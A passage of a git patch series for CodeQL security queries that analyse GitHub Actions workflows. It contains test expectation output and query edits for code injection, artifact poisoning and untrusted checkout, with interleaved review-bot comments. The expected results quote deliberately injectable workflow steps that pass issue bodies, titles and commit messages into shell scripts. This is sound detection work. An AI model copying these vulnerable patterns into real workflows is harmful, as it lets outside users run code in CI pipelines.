| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | .github/workflows/test.yml | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout1.yml | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches3.yml | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches5.yml | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4a561f26cb21..5d1ae7c3e74f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -7,7 +7,7 @@ edges | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | -| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | 
@@ -215,18 +215,16 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -612,8 +613,6 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | From aecb478e1c4d79206d19fcecfd8cde3a3e5f4146 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:58:45 +0100 Subject: [PATCH 640/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index a8fab7861815..29687dd7a061 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.77
+version: 0.1.78
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index f5924ff430c4..7b88d83d38e0 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.77
+version: 0.1.78
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 0ad7f08c9fc7e429585f287e9ca75e2689d6e173 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 16:15:47 +0100 Subject: [PATCH 641/707] fix: do not require github.event.workflow_run.id as an argument for gh run download --- ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll | 1 - 1 file changed, 1 deletion(-)
diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
index 56f363164872..31427287b0c8 100644
--- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
+++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
@@ -178,7 +178,6 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run {
 GHRunArtifactDownloadStep() {
 // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
 this.getScript().getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and
- this.getScript().getACommand().matches("%github.event.workflow_run.id%") and
 (
 this.getScript().getACommand().regexpMatch(unzipRegexp()) or
 this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp())
From 31a9346d2d0a1a7dd79d3d3744be9680c845538e Mon Sep 17 00:00:00 2001 
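Review bot: With the `matches("%github.event.workflow_run.id%")` conjunct removed, `GHRunArtifactDownloadStep` now classifies every `gh run download` that is followed by an unzip as an untrusted artifact download, including a step that fetches the current run's own artifacts (for example via `${{ github.run_id }}`), which the surrounding model may not treat as untrusted. If that widening is not intended, a narrower replacement for the removed line would be `not this.getScript().getACommand().matches("%github.run_id%") and`, so that only downloads from another run stay flagged. The `// eg:` comment still shows only the `workflow_run.id` form; adding the case this commit is meant to catch, such as a constructed `// or: - run: gh run download "$RUN_ID" --name "artifact_name"` where the id arrives through an environment variable, would document the new intent. The characteristic predicate continues past the end of the hunk.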
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 11:59:59 +0100 Subject: [PATCH 642/707] feat: show trigger event on query results --- .../CWE-077/EnvPathInjectionCritical.ql | 4 +- .../CWE-077/EnvVarInjectionCritical.ql | 4 +- .../CWE-078/CommandInjectionCritical.ql | 4 +- .../CWE-088/ArgumentInjectionCritical.ql | 4 +- .../Security/CWE-094/CodeInjectionCritical.ql | 3 +- .../CWE-349/CachePoisoningViaCodeInjection.ql | 4 +- .../CachePoisoningViaPoisonableStep.ql | 3 +- .../UntrustedCheckoutTOCTOUCritical.ql | 3 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 3 +- .../CWE-829/ArtifactPoisoningCritical.ql | 4 +- .../CWE-829/UntrustedCheckoutCritical.ql | 3 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 3 +- .../CWE-077/EnvPathInjectionCritical.expected | 10 +- .../CWE-077/EnvVarInjectionCritical.expected | 72 ++--- .../CWE-078/CommandInjectionCritical.expected | 2 +- .../ArgumentInjectionCritical.expected | 24 +- .../CWE-094/CodeInjectionCritical.expected | 302 +++++++++--------- .../CachePoisoningViaCodeInjection.expected | 2 +- .../CachePoisoningViaPoisonableStep.expected | 14 +- .../UntrustedCheckoutTOCTOUCritical.expected | 20 +- .../UntrustedCheckoutTOCTOUHigh.expected | 4 +- .../ArtifactPoisoningCritical.expected | 34 +- .../UntrustedCheckoutCritical.expected | 80 ++--- .../CWE-829/UntrustedCheckoutHigh.expected | 44 +-- 24 files changed, 326 insertions(+), 324 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 7d8a3b490091..3bb1558788a6 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql 
@@ -35,5 +35,5 @@ where
 sink.getNode() instanceof EnvPathInjectionFromFileReadSink
 )
 select sink.getNode(), source, sink,
- "Potential PATH environment variable injection in $@, which may be controlled by an external user.",
- sink, sink.getNode().toString()
+ "Potential PATH environment variable injection in $@, which may be controlled by an external user ($@).",
+ sink, sink.getNode().toString(), event, event.getName()
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
index 540edfd8b5f9..13086c630808 100644
--- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
+++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
@@ -44,5 +44,5 @@ where
 )
 )
 select sink.getNode(), source, sink,
- "Potential environment variable injection in $@, which may be controlled by an external user.",
- sink, sink.getNode().toString()
+ "Potential environment variable injection in $@, which may be controlled by an external user ($@).",
+ sink, sink.getNode().toString(), event, event.getName()
diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql
index c3d6fa74f6c5..7d45b25b1a29 100644
--- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql
+++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql
@@ -26,5 +26,5 @@ where
 check.protects(sink.getNode().asExpr(), event, ["command-injection", "code-injection"])
 )
 select sink.getNode(), source, sink,
- "Potential command injection in $@, which may be controlled by an external user.", sink,
- sink.getNode().asExpr().(Expression).getRawExpression()
+ "Potential command injection in $@, which may be controlled by an external user ($@).", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName()
diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql
index 5962132d72e7..6930e2f684a4 100644
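Review bot: The new trailing `$@` on the EnvPathInjectionCritical.ql select line relies on `event` being declared in `from` and constrained in `where`, neither of which is visible here; if `event` ranges over all of a workflow's `on:` triggers, a workflow with several triggers now yields one result row per event, whereas the previous select columns were identical across events and QL collapsed them into a single row. The same select shape is repeated in the EnvVarInjectionCritical.ql and CommandInjectionCritical.ql hunks on this line and in the ArgumentInjectionCritical.ql, CodeInjectionCritical.ql, CachePoisoningViaCodeInjection.ql, ArtifactPoisoningCritical.ql and TOCTOU hunks that follow. If one alert per triggering event is intended, a comment above the `select`, such as `// one alert per triggering event; the trailing $@ names it`, would record that decision; if not, `event` has to be restricted to the trigger that makes the sink reachable before the `select`. The `from` and `where` clauses begin outside the hunk.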
--- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql
+++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql
@@ -25,5 +25,5 @@ where
 check.protects(sink.getNode().asExpr(), event, "argument-injection")
 )
 select sink.getNode(), source, sink,
- "Potential argument injection in $@ command, which may be controlled by an external user.", sink,
- sink.getNode().(ArgumentInjectionSink).getCommand()
+ "Potential argument injection in $@ command, which may be controlled by an external user ($@).",
+ sink, sink.getNode().(ArgumentInjectionSink).getCommand(), event, event.getName()
diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql
index a197c5779483..b52c07023443 100644
--- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql
+++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql
@@ -33,5 +33,4 @@ where
 )
 select sink.getNode(), source, sink,
 "Potential code injection in $@, which may be controlled by an external user ($@).", sink,
- sink.getNode().asExpr().(Expression).getRawExpression(), event,
- event.getLocation().getFile().toString()
+ sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName()
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql
index fe49b2dd3b51..23e1f223073f 100644
--- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql
+++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql
@@ -44,5 +44,5 @@ where
 )
 )
 select sink.getNode(), source, sink,
- "Unprivileged code injection in $@, which may lead to cache poisoning.", sink,
- sink.getNode().asExpr().(Expression).getRawExpression()
+ "Unprivileged code injection in $@, which may lead to cache poisoning ($@).", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName()
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql
index 74f49fccd30a..95adcfaf78ec 100644
--- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql
+++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql
@@ -58,4 +58,5 @@ where
 // excluding privileged workflows since they can be exploited in easier circumstances
 not job.isPrivileged()
 select step, source, step,
- "Potential cache poisoning in the context of the default branch " + message
+ "Potential cache poisoning in the context of the default branch " + message + " ($@).", event,
+ event.getName()
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
index 16fb2606af79..2aacf20b35fc 100644
--- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
@@ -28,4 +28,5 @@ where
 exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and
 not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou"))
 select step, checkout, step,
- "Insufficient protection against execution of untrusted code on a privileged workflow."
+ "Insufficient protection against execution of untrusted code on a privileged workflow ($@).",
+ event, event.getName()
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
index d4ed49e497aa..dde6ae69c488 100644
--- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
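Review bot: The CachePoisoningViaPoisonableStep.ql alert is now `"... default branch " + message + " ($@).", event,`; `message` is built outside this hunk and, since it used to close the alert on its own, may already end with a period, in which case the rendered text becomes `... . ($@).`. Worth checking how `message` is terminated and either dropping its trailing period or using the suffix `" ($@)"` so the punctuation is not doubled. The `where` clause that defines `message` starts outside the hunk.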
@@ -26,4 +26,5 @@ where
 exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and
 not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou"))
 select checkout,
- "Insufficient protection against execution of untrusted code on a privileged workflow."
+ "Insufficient protection against execution of untrusted code on a privileged workflow ($@).",
+ event, event.getName()
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql
index e4ab90e5fc2e..afef7bdd82b2 100644
--- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql
+++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql
@@ -24,5 +24,5 @@ where
 check.protects(sink.getNode().asExpr(), event, "artifact-poisoning")
 )
 select sink.getNode(), source, sink,
- "Potential artifact poisoning in $@, which may be controlled by an external user.", sink,
- sink.getNode().toString()
+ "Potential artifact poisoning in $@, which may be controlled by an external user ($@).", sink,
+ sink.getNode().toString(), event, event.getName()
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
index 07602af0ac4a..c1d3729701d1 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
@@ -52,5 +52,4 @@ where
 not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and
 not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout"))
 select poisonable, checkout, poisonable,
- "Execution of untrusted code on a privileged workflow ($@)", event,
- event.getLocation().getFile().toString()
+ "Potential execution of untrusted code on a privileged workflow ($@)", event, event.getName()
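Review bot: The UntrustedCheckoutCritical.ql alert string `"Potential execution of untrusted code on a privileged workflow ($@)"` has no closing period, while every other query touched by this commit ends its message with ` ($@).`; the UntrustedCheckoutHigh.ql hunk on the next line has the same form. Suggest `"Potential execution of untrusted code on a privileged workflow ($@)."` in both places so alert text is uniform across the suite. As these are output strings, the corresponding .expected files would need the same adjustment.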
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
index 39cd18600975..98b9aee33f77 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
@@ -42,4 +42,5 @@ where
 not event.getName() = "issue_comment" and
 not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout"))
 )
-select checkout, "Potential execution of untrusted code on a privileged workflow."
+select checkout, "Potential execution of untrusted code on a privileged workflow ($@)", event,
+ event.getName()
diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
index 851aa5241546..f544994fc5c1 100644
--- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
